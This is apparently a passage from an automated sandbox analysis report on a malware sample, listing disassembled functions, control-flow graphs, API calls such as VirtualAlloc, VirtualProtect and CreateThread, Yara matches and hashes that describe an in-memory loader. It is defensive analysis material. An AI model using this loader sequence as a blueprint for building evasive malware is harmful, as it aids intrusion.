                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressAllocProcVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2770133467-0
                                                                                                                                                                                                                    • Opcode ID: ebbadc81aebed61b38de97e612dd9578c9ed19d327f4b89fda4351677e85069e
                                                                                                                                                                                                                    • Instruction ID: 88ad4baaf8dd8e33a2bbbba0a83ff74e0a94da412aea31168dd892c20b84a379
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebbadc81aebed61b38de97e612dd9578c9ed19d327f4b89fda4351677e85069e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 267214379143218FC74BFF75EC8756A376AEB93310F46862EE802DB166DF3855028A85
                                                                                                                                                                                                                    Function 003A827C Relevance: 3.8, APIs: 2, Instructions: 774librarymemoryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 003A8433
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressAllocProcVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2770133467-0
                                                                                                                                                                                                                    • Opcode ID: 26b7c388c938c0547108e5e21c812eb0eb564391889452223872f28aea43a13a
                                                                                                                                                                                                                    • Instruction ID: cb9f25a33cee7e61169141a983398746f4be9b19d861a089789f12c1af1926f5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26b7c388c938c0547108e5e21c812eb0eb564391889452223872f28aea43a13a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F4202379043218FC74BFF79EC8756A376AEB93310F45862EE802DB166DF3855428A91
                                                                                                                                                                                                                    Function 003A836A Relevance: 3.7, APIs: 2, Instructions: 720librarymemoryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 003A8433
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressAllocProcVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2770133467-0
                                                                                                                                                                                                                    • Opcode ID: 3b5f2700535dcf6097441ce3006db04afaa227aa1a59fff034c51bfeb2f2bdaf
                                                                                                                                                                                                                    • Instruction ID: 1058932a26caa12d1970695e0890995366179c6b4df5461924b3e130dcf8d379
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b5f2700535dcf6097441ce3006db04afaa227aa1a59fff034c51bfeb2f2bdaf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A93215379003218FDB4BFF75EC8756A376AEB93310F45862EE802DB166DF3855428A91
                                                                                                                                                                                                                    Function 00B0094B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1310 b0094b-b009a2 GetPEB 1311 b009ad-b009b1 1310->1311 1312 b00a51-b00a58 1311->1312 1313 b009b7-b009c2 1311->1313 1314 b00a63-b00a67 1312->1314 1315 b009c8-b009df 1313->1315 1316 b00a4c 1313->1316 1318 b00a78-b00a7f 1314->1318 1319 b00a69-b00a76 1314->1319 1320 b009e1-b00a02 1315->1320 1321 b00a04-b00a1c CreateThread 1315->1321 1316->1311 1323 b00a81-b00a83 1318->1323 1324 b00a88-b00a8d 1318->1324 1319->1314 1325 b00a20-b00a28 1320->1325 1321->1325 1323->1324 1325->1316 1326 b00a2a-b00a47 1325->1326 1326->1316
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00B00A17
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                    • API String ID: 2422867632-3772416878
                                                                                                                                                                                                                    • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                    • Instruction ID: 3b2c94b69226908bbc692ed78ec0948c11989a78917eb71c5eb87aedbebcdeed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5941A274A00209EFDB14DF98C994BAEBBB1FF88314F208198D515AB391C775AE81DF94
                                                                                                                                                                                                                    Function 00B0038B Relevance: 1.9, APIs: 1, Instructions: 399threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1357 b0038b-b004f3 call b0093b call b00f3b call b010eb call b00cdb 1366 b00924-b00927 1357->1366 1367 b004f9-b00500 1357->1367 1368 b0050b-b0050f 1367->1368 1369 b00531-b005ac GetPEB 1368->1369 1370 b00511-b0052f call b00e5b 1368->1370 1371 b005b7-b005bb 1369->1371 1370->1368 1373 b005d3-b005e5 call b00a9b 1371->1373 1374 b005bd-b005d1 1371->1374 1380 b005e7-b0060d 1373->1380 1381 b0060f-b00630 CreateThread 1373->1381 1374->1371 1382 b00633-b00637 1380->1382 1381->1382 1384 b008f8-b0091b 1382->1384 1385 b0063d-b00670 call b00f9b 1382->1385 1384->1366 1385->1384 1389 b00676-b006c5 1385->1389 1391 b006d0-b006d6 1389->1391 1392 b006d8-b006de 1391->1392 1393 b0071e-b00722 1391->1393 1394 b006e0-b006ef 1392->1394 1395 b006f1-b006f5 1392->1395 1396 b007f0-b008e3 call b00a9b call b0093b call b00f3b 1393->1396 1397 b00728-b00735 1393->1397 1394->1395 1398 b006f7-b00705 1395->1398 1399 b0071c 1395->1399 1423 b008e5 1396->1423 1424 b008e8-b008f2 1396->1424 1400 b00740-b00746 1397->1400 1398->1399 1401 b00707-b00719 1398->1401 1399->1391 1404 b00776-b00779 1400->1404 1405 b00748-b00756 1400->1405 1401->1399 1406 b0077c-b00783 1404->1406 1408 b00774 1405->1408 1409 b00758-b00767 1405->1409 1406->1396 1410 b00785-b0078e 1406->1410 1408->1400 1409->1408 1412 b00769-b00772 1409->1412 1410->1396 1414 b00790-b007a0 1410->1414 1412->1404 1416 b007ab-b007b7 1414->1416 1418 b007e8-b007ee 1416->1418 1419 b007b9-b007e6 1416->1419 1418->1406 1419->1416 1423->1424 1424->1384
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 00B0062E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                    • Opcode ID: 83a9ce226285de2af24d33c37b84caa5f46340f75418e4fe094d25e21513067a
                                                                                                                                                                                                                    • Instruction ID: bf71d43f936098de2cda7348e3eaa5d823d23bb634bc4f0e8a289a93cda865a9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83a9ce226285de2af24d33c37b84caa5f46340f75418e4fe094d25e21513067a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F12D2B4E10219DFDB14DF98C991BADBBB2FF88304F2482A9D515AB385C734AA41CF54
                                                                                                                                                                                                                    Function 003A86AA Relevance: 1.8, APIs: 1, Instructions: 516memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                    • Opcode ID: e6db0bfe26ad87675155cc4295882a7761d8dbd8febf9a67d4680601801dad8b
                                                                                                                                                                                                                    • Instruction ID: 720264fff45f30e84cc8d0dd37f0c74a7819c853aa0e8814c17baad71ba8e242
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6db0bfe26ad87675155cc4295882a7761d8dbd8febf9a67d4680601801dad8b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D60226779003218FC70BEF7AEC9756A376AFB93314F45862EE802DB065DF3855428A81
                                                                                                                                                                                                                    Function 003A86F6 Relevance: 1.7, APIs: 1, Instructions: 494memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                    • Opcode ID: 9eb39fae557889e25e2d2902d05143205b1042525ce09bea2374b76993de160e
                                                                                                                                                                                                                    • Instruction ID: df48aa8740f49236d8969e7315d76a3e43a8f93fd9685fe2617e5d1be54011a4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9eb39fae557889e25e2d2902d05143205b1042525ce09bea2374b76993de160e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2F147779003218FDB0BEF7AEC9755A376AFB93310F45862EE802DB065DF3855428A81
                                                                                                                                                                                                                    Function 003A88F2 Relevance: 1.6, APIs: 1, Instructions: 372memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                    • Opcode ID: fa0249d43e39e9eecaf803a95b26af32fb05557c852f509792b866c59a570a09
                                                                                                                                                                                                                    • Instruction ID: 0ac98cb4488dedb0cf55f60dbc6393af8dc13710230795716c2c4f9349504d7e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa0249d43e39e9eecaf803a95b26af32fb05557c852f509792b866c59a570a09
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CC117779003258FCB0BEF76EC9756A376AFB93314F45862EE802DB165DF3855028A81
                                                                                                                                                                                                                    Function 003A899E Relevance: 1.6, APIs: 1, Instructions: 350memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                    • Opcode ID: 8bd12c5a242c404fce5654d0bbcc612aa96b36376ccb807f711b0f7ebeef69e3
                                                                                                                                                                                                                    • Instruction ID: 96276a4e44a7194e4fa0107266bc8bfc7c4e0cf624c20dafd4b5412db7bff6bb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bd12c5a242c404fce5654d0bbcc612aa96b36376ccb807f711b0f7ebeef69e3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCB116779003218FDB1BEF7AEC9756A376AFB93304F45862EE802DB065DF3855028681
                                                                                                                                                                                                                    Function 003A8AFF Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 288383ffe8c6eae3dfdf95e47de925f2707f3fc648658c9d0f0fcb81971d35e9
                                                                                                                                                                                                                    • Instruction ID: fe10e44670d488e84639883cbe1ef6a9eb207072f02118bf198923be5e423395
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 288383ffe8c6eae3dfdf95e47de925f2707f3fc648658c9d0f0fcb81971d35e9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF7118779103108FCB0BEF79EC9759D376AEB93304F41862AE902DB065DF389502C681
                                                                                                                                                                                                                    Function 00B4E8ED Relevance: 6.1, APIs: 4, Instructions: 99memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 706 b4e8ed-b4e907 call b50b0b 709 b4e90f-b4e928 call b50ba9 706->709 710 b4e909-b4e90a 706->710 714 b4e9e0 709->714 715 b4e92e-b4e939 709->715 711 b4e9e4-b4e9e7 710->711 716 b4e9e2-b4e9e3 714->716 715->714 717 b4e93f-b4e94d VirtualProtect 715->717 716->711 717->714 718 b4e953-b4e995 call b50b01 call b51179 VirtualProtect call b50ba9 717->718 718->714 725 b4e997-b4e9a3 718->725 725->714 726 b4e9a5-b4e9b3 VirtualProtect 725->726 726->714 727 b4e9b5-b4e9de call b50b01 call b51179 VirtualProtect 726->727 727->716
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00B50B0B: LoadLibraryA.KERNEL32(00000000,?,?), ref: 00B50B9D
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 00B4E948
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 00B4E97B
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 00B4E9AE
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 00B4E9D8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 895956442-0
                                                                                                                                                                                                                    • Opcode ID: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
                                                                                                                                                                                                                    • Instruction ID: 71b953ea1ca6de3d8a45256ff0091f53da736674168cdbf8cfbba260cd5070d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0421E5722042097FE310AA658C86F7B76DCEB85305F0408BAFF56D10D1EB75EA089271
                                                                                                                                                                                                                    Function 00B4F75D Relevance: 4.8, APIs: 3, Instructions: 325memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 732 b4f75d-b4f7c1 call b50d04 * 3 739 b4f7c3-b4f7c5 732->739 740 b4f7eb 732->740 739->740 741 b4f7c7-b4f7c9 739->741 742 b4f7ee-b4f7f8 740->742 741->740 743 b4f7cb-b4f7dd VirtualAlloc 741->743 744 b4f7df-b4f7e6 743->744 745 b4f7f9-b4f81c call b51179 call b5119d 743->745 744->740 746 b4f7e8 744->746 751 b4f866-b4f87f call b50d04 745->751 752 b4f81e-b4f854 call b50e71 call b50d47 745->752 746->740 751->740 758 b4f885 751->758 761 b4fab5-b4fabe 752->761 762 b4f85a-b4f860 752->762 760 b4f88b-b4f891 758->760 763 b4f893-b4f899 760->763 764 b4f8cd-b4f8d6 760->764 767 b4fac5-b4facd 761->767 768 b4fac0-b4fac3 761->768 762->751 762->761 769 b4f89b-b4f89e 763->769 765 b4f92f-b4f93a 764->765 766 b4f8d8-b4f8de 764->766 773 b4f953-b4f956 765->773 774 b4f93c-b4f945 call b4ea51 765->774 770 b4f8e2-b4f8fd call b50d04 766->770 771 b4fafc 767->771 772 b4facf-b4fafa call b5119d 767->772 768->767 768->771 775 b4f8a0-b4f8a5 769->775 776 b4f8b2-b4f8b4 769->776 795 b4f91c-b4f92d 770->795 796 b4f8ff-b4f907 770->796 779 b4fb00-b4fb20 call b5119d VirtualFree 771->779 772->779 783 b4fab1 773->783 784 b4f95c-b4f965 773->784 774->783 798 b4f94b-b4f951 774->798 775->776 781 b4f8a7-b4f8b0 775->781 776->764 782 b4f8b6-b4f8c4 call b50b0b 776->782 804 b4fb26-b4fb28 779->804 805 b4fb22-b4fb24 RtlExitUserProcess 779->805 781->769 781->776 792 b4f8c9-b4f8cb 782->792 783->761 785 b4f967 784->785 786 b4f96b-b4f972 784->786 785->786 793 b4f974-b4f97d call b4e8ed 786->793 794 b4f9a2-b4f9a6 786->794 792->760 809 b4f97f-b4f985 793->809 810 b4f98b-b4f98c call b4e9e8 793->810 802 b4f9ac-b4f9ce 794->802 803 b4fa48-b4fa4b 794->803 795->765 795->770 796->783 800 b4f90d-b4f916 796->800 798->786 800->783 800->795 802->783 818 b4f9d4-b4f9e7 call b51179 802->818 807 b4fa9d-b4fa9f call b4fe8d 803->807 808 b4fa4d-b4fa50 803->808 804->742 805->804 817 b4faa4-b4faa5 807->817 808->807 811 b4fa52-b4fa55 808->811 809->783 809->810 820 b4f991-b4f994 810->820 815 b4fa57-b4fa59 811->815 816 b4fa6e-b4fa7f call b4f54e 811->816 815->816 821 b4fa5b-b4fa5e 815->821 833 b4fa90-b4fa9b call b4f01a 816->833 834 b4fa81-b4fa8d call b4fb2d 816->834 822 b4faa6-b4faad 817->822 830 b4f9e9-b4f9ed 818->830 831 b4fa0b-b4fa44 818->831 820->794 827 b4f996-b4f99c 820->827 828 b4fa65-b4fa6c call b506fb 821->828 829 b4fa60-b4fa63 821->829 822->783 824 b4faaf 822->824 824->824 827->783 827->794 828->817 829->822 829->828 830->831 835 b4f9ef-b4f9f2 830->835 831->783 844 b4fa46 831->844 833->817 834->833 835->803 839 b4f9f4-b4fa09 call b50f7c 835->839 839->844 844->803
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B4F7D7
                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 00B4FB1B
                                                                                                                                                                                                                    • RtlExitUserProcess.NTDLL(00000000), ref: 00B4FB24
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$AllocExitFreeProcessUser
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1828502597-0
                                                                                                                                                                                                                    • Opcode ID: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
                                                                                                                                                                                                                    • Instruction ID: 82ee01c5e8c515aacdbebbb7d70a06f0e087df7b39c266e0971f48ab85e96472
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CB1D132500A07ABDB21AE64CC84BBBB7F8FF05300F1405B9FA5997151E731EA54EBA1
                                                                                                                                                                                                                    Function 00B50B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1329 b50b0b-b50b1e 1330 b50b36-b50b40 1329->1330 1331 b50b20-b50b23 1329->1331 1333 b50b42-b50b4a 1330->1333 1334 b50b4f-b50b5b 1330->1334 1332 b50b25-b50b28 1331->1332 1332->1330 1335 b50b2a-b50b34 1332->1335 1333->1334 1336 b50b5e-b50b63 1334->1336 1335->1330 1335->1332 1337 b50b65-b50b70 1336->1337 1338 b50b96-b50b9d LoadLibraryA 1336->1338 1339 b50b72-b50b8a call b511d9 1337->1339 1340 b50b8c-b50b90 1337->1340 1341 b50ba0-b50ba4 1338->1341 1339->1340 1345 b50ba5-b50ba7 1339->1345 1340->1336 1343 b50b92-b50b94 1340->1343 1343->1338 1343->1341 1345->1341
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(00000000,?,?), ref: 00B50B9D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
